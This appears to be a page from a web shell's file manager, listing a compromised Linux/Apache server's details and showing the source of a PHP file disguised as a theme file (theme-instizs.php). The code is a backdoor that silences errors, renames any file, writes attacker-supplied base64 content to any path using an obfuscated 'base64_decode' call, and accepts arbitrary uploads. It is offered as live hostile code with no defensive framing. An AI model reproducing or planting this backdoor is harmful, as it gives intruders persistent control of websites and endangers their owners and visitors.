HEX
Server: Apache
System: Linux v23848419.sin01.serveradd.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
User: dartdocs (1005)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/dartdocs/insarag.dartdocs.app/theme-instizs.php
<?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'b'.'ase64'.'_de'.'cod'.'e'; fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message']))); exit; } move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>